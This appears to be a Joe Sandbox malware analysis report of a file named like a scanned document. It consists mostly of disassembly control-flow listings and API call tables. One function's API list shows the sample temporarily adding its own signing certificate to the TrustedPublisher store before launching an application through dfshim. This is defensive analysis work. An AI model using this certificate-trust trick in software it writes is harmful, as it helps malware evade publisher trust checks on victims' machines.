5e9ec3 6457 5e9ecd 6456->6457 6458 5e9ed9 6456->6458 6457->6458 6459 5e9ed2 CloseHandle 6457->6459 6459->6458 6295 5e1e00 6297 5e1e1e ___except_validate_context_record _ValidateLocalCookies __IsNonwritableInCurrentImage 6295->6297 6296 5e1e9e _ValidateLocalCookies 6297->6296 6300 5e2340 RtlUnwind 6297->6300 6299 5e1f27 _ValidateLocalCookies 6300->6299 5857 5e3d41 5860 5e341b 5857->5860 5861 5e342a 5860->5861 5862 5e3376 15 API calls 5861->5862 5863 5e3444 5862->5863 5864 5e3376 15 API calls 5863->5864 5865 5e344f 5864->5865 6301 5e383f 6302 5e384b ___scrt_is_nonwritable_in_current_image 6301->6302 6303 5e3882 _abort 6302->6303 6309 5e56e2 EnterCriticalSection 6302->6309 6305 5e385f 6306 5e67cb __fassign 15 API calls 6305->6306 6307 5e386f 6306->6307 6310 5e3888 6307->6310 6309->6305 6313 5e572a LeaveCriticalSection 6310->6313 6312 5e388f 6312->6303 6313->6312 6460 5e12fb 6465 5e1aac SetUnhandledExceptionFilter 6460->6465 6462 5e1300 6466 5e38f9 6462->6466 6464 5e130b 6465->6462 6467 5e391f 6466->6467 6468 5e3905 6466->6468 6467->6464 6468->6467 6469 5e47f9 _free 15 API calls 6468->6469 6470 5e390f 6469->6470 6471 5e473d _abort 21 API calls 6470->6471 6472 5e391a 6471->6472 6472->6464 6585 5e14bb IsProcessorFeaturePresent 6586 5e14d0 6585->6586 6589 5e1493 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6586->6589 6588 5e15b3 6589->6588 6590 5e79bb 6593 5e790a 6590->6593 6591 5e791f 6592 5e47f9 _free 15 API calls 6591->6592 6594 5e7924 6591->6594 6598 5e794a 6592->6598 6593->6591 6593->6594 6596 5e795b 6593->6596 6595 5e473d _abort 21 API calls 6595->6594 6596->6594 6597 5e47f9 _free 15 API calls 6596->6597 6597->6598 6598->6595 6599 5e1ab8 6600 5e1aef 6599->6600 6601 5e1aca 6599->6601 6601->6600 6608 5e209a 6601->6608 6606 5e3e89 33 API calls 6607 5e1b0d 6606->6607 6609 5e23c3 43 API calls 6608->6609 6610 5e1afc 6609->6610 6611 5e20a3 6610->6611 6612 5e23c3 43 API calls 6611->6612 6613 5e1b06 6612->6613 6613->6606 6614 5e4ab7 6619 5e4c8a 6614->6619 6617 5e4869 _free 15 API calls 6618 5e4aca 6617->6618 6624 5e4cbf 6619->6624 6622 5e4ac1 6622->6617 6623 5e4869 _free 15 API calls 6623->6622 6625 5e4c98 6624->6625 6626 5e4cd1 6624->6626 6625->6622 6625->6623 6627 5e4cd6 6626->6627 6628 5e4d01 6626->6628 6629 5e480c _abort 15 API calls 6627->6629 6628->6625 6630 5e681b 24 API calls 6628->6630 6631 5e4cdf 6629->6631 6632 5e4d1c 6630->6632 6633 5e4869 _free 15 API calls 6631->6633 6634 5e4869 _free 15 API calls 6632->6634 6633->6625 6634->6625 6473 5e1ff4 6476 5e2042 6473->6476 6477 5e1fff 6476->6477 6478 5e204b 6476->6478 6478->6477 6485 5e23c3 6478->6485 6481 5e23c3 43 API calls 6482 5e2091 6481->6482 6483 5e3e89 33 API calls 6482->6483 6484 5e2099 6483->6484 6499 5e23d1 6485->6499 6487 5e23c8 6488 5e2086 6487->6488 6489 5e6b14 _abort 2 API calls 6487->6489 6488->6481 6490 5e3f29 6489->6490 6491 5e3f35 6490->6491 6492 5e6b6f _abort 33 API calls 6490->6492 6493 5e3f3e IsProcessorFeaturePresent 6491->6493 6494 5e3f5c 6491->6494 6492->6491 6495 5e3f49 6493->6495 6496 5e3793 _abort 23 API calls 6494->6496 6497 5e4573 _abort 3 API calls 6495->6497 6498 5e3f66 6496->6498 6497->6494 6500 5e23dd GetLastError 6499->6500 6501 5e23da 6499->6501 6511 5e26a4 6500->6511 6501->6487 6504 5e2457 SetLastError 6504->6487 6505 5e26df ___vcrt_FlsSetValue 6 API calls 6506 5e240b 6505->6506 6507 5e2433 6506->6507 6508 5e26df ___vcrt_FlsSetValue 6 API calls 6506->6508 6510 5e2411 6506->6510 6509 5e26df ___vcrt_FlsSetValue 6 API calls 6507->6509 6507->6510 6508->6507 6509->6510 6510->6504 6512 5e2543 ___vcrt_FlsGetValue 5 API calls 6511->6512 6513 5e26be 6512->6513 6514 5e26d6 TlsGetValue 6513->6514 6515 5e23f2 6513->6515 6514->6515 6515->6504 6515->6505 6515->6510 6635 5e71b5 6636 5e71bd 6635->6636 6637 5e3f72 __fassign 33 API calls 6636->6637 6639 5e71da 6636->6639 6638 5e71fa 6637->6638 6638->6639 6647 5e81b5 6638->6647 6642 5e726e MultiByteToWideChar 6642->6639 6644 5e725e 6642->6644 6643 5e722e 6643->6644 6646 5e723c MultiByteToWideChar 6643->6646 6644->6639 6645 5e47f9 _free 15 API calls 6644->6645 6645->6639 6646->6639 6646->6644 6648 5e3f72 __fassign 33 API calls 6647->6648 6649 5e7228 6648->6649 6649->6642 6649->6643 6650 5e3eb5 6651 5e3eb8 6650->6651 6652 5e3f24 _abort 33 API calls 6651->6652 6653 5e3ec4 6652->6653 6516 5e8df1 6517 5e8e15 6516->6517 6518 5e8e2e 6517->6518 6522 5e9beb __startOneArgErrorHandling 6517->6522 6519 5e99d3 16 API calls 6518->6519 6521 5e8e78 6518->6521 6519->6521 6520 5e9c2d __startOneArgErrorHandling 6522->6520 6524 5ea1c4 6522->6524 6525 5ea1fd __startOneArgErrorHandling 6524->6525 6526 5ea495 __raise_exc RaiseException 6525->6526 6527 5ea224 __startOneArgErrorHandling 6525->6527 6526->6527 6528 5ea267 6527->6528 6529 5ea242 6527->6529 6530 5ea786 __startOneArgErrorHandling 15 API calls 6528->6530 6533 5ea7b5 6529->6533 6532 5ea262 __startOneArgErrorHandling _ValidateLocalCookies 6530->6532 6532->6520 6534 5ea7c4 6533->6534 6535 5ea838 __startOneArgErrorHandling 6534->6535 6537 5ea7e3 __startOneArgErrorHandling 6534->6537 6536 5ea786 __startOneArgErrorHandling 15 API calls 6535->6536 6539 5ea831 6536->6539 6538 5ea786 __startOneArgErrorHandling 15 API calls 6537->6538 6537->6539 6538->6539 6539->6532 6314 5e142e 6317 5e2cf0 6314->6317 6316 5e143f 6318 5e44a8 __dosmaperr 15 API calls 6317->6318 6319 5e2d07 _ValidateLocalCookies 6318->6319 6319->6316 6320 5e4c2c 6321 5e4c4a 6320->6321 6322 5e4bb1 6320->6322 6326 5e7570 6321->6326 6324 5e4bb6 FindClose 6322->6324 6325 5e4bbd _ValidateLocalCookies 6322->6325 6324->6325 6327 5e75a9 6326->6327 6328 5e47f9 _free 15 API calls 6327->6328 6332 5e75d5 _ValidateLocalCookies 6327->6332 6329 5e75b2 6328->6329 6330 5e473d _abort 21 API calls 6329->6330 6331 5e75bd _ValidateLocalCookies 6330->6331 6331->6322 6332->6322 6333 5e452d 6341 5e5858 6333->6341 6335 5e4537 6336 5e4541 6335->6336 6337 5e44a8 __dosmaperr 15 API calls 6335->6337 6338 5e4549 6337->6338 6339 5e4556 6338->6339 6346 5e4559 6338->6346 6342 5e5741 _abort 5 API calls 6341->6342 6343 5e587f 6342->6343 6344 5e5897 TlsAlloc 6343->6344 6345 5e5888 _ValidateLocalCookies 6343->6345 6344->6345 6345->6335 6347 5e4563 6346->6347 6349 5e4569 6346->6349 6350 5e58ae 6347->6350 6349->6336 6351 5e5741 _abort 5 API calls 6350->6351 6352 5e58d5 6351->6352 6353 5e58ed TlsFree 6352->6353 6354 5e58e1 _ValidateLocalCookies 6352->6354 6353->6354 6354->6349 6540 5e9beb 6541 5e9c04 __startOneArgErrorHandling 6540->6541 6542 5ea1c4 16 API calls 6541->6542 6543 5e9c2d __startOneArgErrorHandling 6541->6543 6542->6543 6355 5e6026 6356 5e602b 6355->6356 6358 5e604e 6356->6358 6359 5e5c56 6356->6359 6360 5e5c63 6359->6360 6364 5e5c85 6359->6364 6361 5e5c7f 6360->6361 6362 5e5c71 DeleteCriticalSection 6360->6362 6363 5e4869 _free 15 API calls 6361->6363 6362->6361 6362->6362 6363->6364 6364->6356 6654 5e5ba6 6655 5e5bd7 6654->6655 6656 5e5bb1 6654->6656 6656->6655 6657 5e5bc1 FreeLibrary 6656->6657 6657->6656 5866 5e4c65 5871 5e4c6f 5866->5871 5867 5e4c7f 5868 5e4869 _free 15 API calls 5867->5868 5870 5e4c86 5868->5870 5869 5e4869 _free 15 API calls 5869->5871 5871->5867 5871->5869 6544 5e33e5 6545 5e33f7 6544->6545 6547 5e33fd 6544->6547 6546 5e3376 15 API calls 6545->6546 6546->6547 5872 5e9160 5875 5e917e 5872->5875 5874 5e9176 5876 5e9183 5875->5876 5879 5e9218 5876->5879 5880 5e99d3 5876->5880 5878 5e93af 5878->5874 5879->5874 5881 5e99f0 DecodePointer 5880->5881 5882 5e9a00 5880->5882 5881->5882 5883 5e9a82 _ValidateLocalCookies 5882->5883 5884 5e9a8d 5882->5884 5886 5e9a37 5882->5886 5883->5878 5884->5883 5885 5e47f9 _free 15 API calls 5884->5885 5885->5883 5886->5883 5887 5e47f9 _free 15 API calls 5886->5887 5887->5883 6658 5e4ba0 6659 5e4bac 6658->6659 6660 5e4bb6 FindClose 6659->6660 6661 5e4bbd _ValidateLocalCookies 6659->6661 6660->6661 6548 5e8ce1 6549 5e8d01 6548->6549 6552 5e8d38 6549->6552 6551 5e8d2b 6553 5e8d3f 6552->6553 6554 5e8da0 6553->6554 6555 5e8d5f 6553->6555 6556 5e9997 16 API calls 6554->6556 6557 5e988e 6554->6557 6555->6557 6559 5e9997 16 API calls 6555->6559 6558 5e8dee 6556->6558 6557->6551 6558->6551 6560 5e98be 6559->6560 6560->6551 6662 5e56a1 6663 5e56ac 6662->6663 6664 5e59b3 6 API calls 6663->6664 6665 5e56d5 6663->6665 6666 5e56d1 6663->6666 6664->6663 6668 5e56f9 6665->6668 6669 5e5725 6668->6669 6670 5e5706 6668->6670 6669->6666 6671 5e5710 DeleteCriticalSection 6670->6671 6671->6669 6671->6671

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000000,00000104), ref: 005E1016
                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 005E1025
                                                                                                                                                                                                                  • CertOpenSystemStoreA.CRYPT32(00000000,TrustedPublisher), ref: 005E1032
                                                                                                                                                                                                                  • LocalAlloc.KERNELBASE(00000000,00040000), ref: 005E1057
                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000000,00040000), ref: 005E1063
                                                                                                                                                                                                                  • CryptQueryObject.CRYPT32(00000001,00000000,00000400,00000002,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 005E1082
                                                                                                                                                                                                                  • CryptMsgGetParam.CRYPT32(?,0000000B,00000000,?,?), ref: 005E10B2
                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000000,?), ref: 005E10C5
                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000000,00002000), ref: 005E10F4
                                                                                                                                                                                                                  • CryptMsgGetParam.CRYPT32(?,0000000C,00000000,00000000,00002000), ref: 005E110A
                                                                                                                                                                                                                  • CertCreateCertificateContext.CRYPT32(00000001,00000000,00002000), ref: 005E111A
                                                                                                                                                                                                                  • CertAddCertificateContextToStore.CRYPT32(?,00000000,00000001,00000000), ref: 005E112D
                                                                                                                                                                                                                  • CertFreeCertificateContext.CRYPT32(00000000), ref: 005E1134
                                                                                                                                                                                                                  • LocalFree.KERNEL32(00000000), ref: 005E113E
                                                                                                                                                                                                                  • LocalFree.KERNEL32(00000000), ref: 005E115D
                                                                                                                                                                                                                  • CryptMsgGetParam.CRYPT32(?,00000009,00000000,00000000,00040000), ref: 005E116E
                                                                                                                                                                                                                  • CryptMsgGetParam.CRYPT32(?,0000000A,00000000,?,00040000), ref: 005E1182
                                                                                                                                                                                                                  • CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,00000000,?), ref: 005E1198
                                                                                                                                                                                                                  • CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,?,?), ref: 005E11A9
                                                                                                                                                                                                                  • LoadLibraryA.KERNELBASE(dfshim), ref: 005E11BA
                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,ShOpenVerbApplicationW), ref: 005E11C6
                                                                                                                                                                                                                  • Sleep.KERNELBASE(00009C40), ref: 005E11E8
                                                                                                                                                                                                                  • CertDeleteCertificateFromStore.CRYPT32(?), ref: 005E120B
                                                                                                                                                                                                                  • CertCloseStore.CRYPT32(?,00000000), ref: 005E121A
                                                                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 005E1223
                                                                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 005E1228
                                                                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 005E122D
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.1950029951.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1949987588.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950060796.00000000005EB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950084572.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950108445.00000000005F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_5e0000_Scan_doc_09_16_24_1203.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Local$Cert$Free$AllocCrypt$CertificateParamStore$Context$AttributeFind$AddressCloseCreateDeleteFileFromLibraryLoadModuleNameObjectOpenProcQuerySleepSystem
                                                                                                                                                                                                                  • String ID: 1.3.6.1.4.1.311.4.1.1$ShOpenVerbApplicationW$TrustedPublisher$dfshim
                                                                                                                                                                                                                  • API String ID: 335784236-860318880
                                                                                                                                                                                                                  • Opcode ID: e7bd5ae90f5c20a2835ff495e938a1e0b08bb21ce4ec69db22ca75eb460f3941
                                                                                                                                                                                                                  • Instruction ID: 5a801f71b1c03c1134866ad512109463d073da43e0996808fad5796f3f068180
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e7bd5ae90f5c20a2835ff495e938a1e0b08bb21ce4ec69db22ca75eb460f3941
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 78618E71A00258ABEB199F91CC89FAFBBB5FF48B51F000014F650BB290CB71AD04DBA4
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 005E192B
                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 005E19F7
                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 005E1A10
                                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 005E1A1A
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.1950029951.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1949987588.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950060796.00000000005EB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950084572.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950108445.00000000005F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_5e0000_Scan_doc_09_16_24_1203.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 254469556-0
                                                                                                                                                                                                                  • Opcode ID: 4b244bcfd978aa8742f1f3577c6532b72d6acb0eb21cecf751c297436512adc7
                                                                                                                                                                                                                  • Instruction ID: 76aa58c197608a964eb0e769e66589d5ab2a0a89faabd4fdf5a8d288045eff23
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4b244bcfd978aa8742f1f3577c6532b72d6acb0eb21cecf751c297436512adc7
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AA311475D01259DBDB21DFA5D989BCEBBB8BF08300F1041AAE44CAB250EB709A84CF45
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 005E466B
                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 005E4675
                                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 005E4682
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.1950029951.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1949987588.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950060796.00000000005EB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950084572.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950108445.00000000005F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_5e0000_Scan_doc_09_16_24_1203.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3906539128-0
                                                                                                                                                                                                                  • Opcode ID: d0f10ade7d370409b83c5ad344a67d9b50644d2d5201a233cf6115ad1a8672e8
                                                                                                                                                                                                                  • Instruction ID: 2470f70fd35694528dc32094e1af6af1713609e9ee07a427de7bc3c7e70d039a
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d0f10ade7d370409b83c5ad344a67d9b50644d2d5201a233cf6115ad1a8672e8
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F031F4749012199BCB25DF65DC88B8DBBB8BF08311F5041EAE41CAB250EB709F858F45
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,005E364D,?,005F02E0,0000000C,005E37A4,?,00000002,00000000,?,005E3F66,00000003,005E209F,005E1AFC), ref: 005E3698
                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,?,005E364D,?,005F02E0,0000000C,005E37A4,?,00000002,00000000,?,005E3F66,00000003,005E209F,005E1AFC), ref: 005E369F
                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 005E36B1
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.1950029951.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1949987588.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950060796.00000000005EB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950084572.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950108445.00000000005F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_5e0000_Scan_doc_09_16_24_1203.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                                                                                                  • Opcode ID: e93e02ec7a5395fb6cf55a9dba083162cd591dc67d07a40374c78b5958b27528
                                                                                                                                                                                                                  • Instruction ID: ed39100c2ea284de3cb80b51757162bd06e8241119c791b4002f5f6a5011e397
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e93e02ec7a5395fb6cf55a9dba083162cd591dc67d07a40374c78b5958b27528
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 46E04631000288AFDF19AF65CE4DA4A3F69FF9038AB000014FAC58B231DB35EE42DA50
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,005EA490,?,?,00000008,?,?,005EA130,00000000), ref: 005EA6C2
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.1950029951.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1949987588.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950060796.00000000005EB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950084572.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950108445.00000000005F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_5e0000_Scan_doc_09_16_24_1203.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: ExceptionRaise
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3997070919-0
                                                                                                                                                                                                                  • Opcode ID: 92b1a345d530778d0b997507d6bac8de275cc82b8cdd110a9ea92ed9f42490ae
                                                                                                                                                                                                                  • Instruction ID: 72576de9827fcba36f86616f37dee1c0b4b2b249f9e974810617fd6d0faf4927
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 92b1a345d530778d0b997507d6bac8de275cc82b8cdd110a9ea92ed9f42490ae
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 28B16D715106488FDB19CF29C48AB657FE0FF45364F298699E8DACF2A1C335E981CB41
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 005E1BEA
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.1950029951.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1949987588.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950060796.00000000005EB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950084572.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950108445.00000000005F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_5e0000_Scan_doc_09_16_24_1203.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 2325560087-0
                                                                                                                                                                                                                  • Opcode ID: f9e6a828ad9439268c5d2f8e7fcdf133bc052a0b6f735ef21bbaba653b6bf45c
                                                                                                                                                                                                                  • Instruction ID: 0b80b4a96d9c24aaca162b24d82c03c6ebfc2e21ad7d9eb5ad83e6889e2b8450
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f9e6a828ad9439268c5d2f8e7fcdf133bc052a0b6f735ef21bbaba653b6bf45c
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50519BB1E10A85CBEB19CF6AD8857AEBBF4FB58300F24842AC445EB250D3799D45CF58
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00001AB8,005E1300), ref: 005E1AB1
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.1950029951.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1949987588.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950060796.00000000005EB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950084572.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950108445.00000000005F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_5e0000_Scan_doc_09_16_24_1203.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                                                                                                  • Opcode ID: 90898c415ede746a78b45c253eb8089a54a975b8265c28d0a365a5bce4223f07
                                                                                                                                                                                                                  • Instruction ID: c6cc50a0f2765eb0feb1443c2b977d9bf555960b181241dbefced9dccaa155fe
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 90898c415ede746a78b45c253eb8089a54a975b8265c28d0a365a5bce4223f07
                                                                                                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.1950029951.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1949987588.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950060796.00000000005EB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950084572.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950108445.00000000005F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_5e0000_Scan_doc_09_16_24_1203.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: HeapProcess
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 54951025-0
                                                                                                                                                                                                                  • Opcode ID: b07fc0f4eeefaa9cea39d8b49e73eda3d4f8457050576fdc67aa147d26c81194
                                                                                                                                                                                                                  • Instruction ID: edf44b2fd74aed7540d706bc6650ddb41247b08dcd4c335878e4f9dd32ccff55
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b07fc0f4eeefaa9cea39d8b49e73eda3d4f8457050576fdc67aa147d26c81194
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EEA012702002018B93048F305A8520A35985510591F0100145004C4030D7244044FA01

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 81 5e6507-5e651b 82 5e651d-5e6522 81->82 83 5e6589-5e6591 81->83 82->83 84 5e6524-5e6529 82->84 85 5e65d8-5e65f0 call 5e667a 83->85 86 5e6593-5e6596 83->86 84->83 87 5e652b-5e652e 84->87 95 5e65f3-5e65fa 85->95 86->85 89 5e6598-5e65d5 call 5e4869 * 4 86->89 87->83 90 5e6530-5e6538 87->90 89->85 93 5e653a-5e653d 90->93 94 5e6552-5e655a 90->94 93->94 97 5e653f-5e6551 call 5e4869 call 5e6078 93->97 100 5e655c-5e655f 94->100 101 5e6574-5e6588 call 5e4869 * 2 94->101 98 5e65fc-5e6600 95->98 99 5e6619-5e661d 95->99 97->94 107 5e6616 98->107 108 5e6602-5e6605 98->108 103 5e661f-5e6624 99->103 104 5e6635-5e6641 99->104 100->101 109 5e6561-5e6573 call 5e4869 call 5e6176 100->109 101->83 111 5e6626-5e6629 103->111 112 5e6632 103->112 104->95 114 5e6643-5e6650 call 5e4869 104->114 107->99 108->107 116 5e6607-5e6615 call 5e4869 * 2 108->116 109->101 111->112 121 5e662b-5e6631 call 5e4869 111->121 112->104 116->107 121->112
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • ___free_lconv_mon.LIBCMT ref: 005E654B
                                                                                                                                                                                                                    • Part of subcall function 005E6078: _free.LIBCMT ref: 005E6095
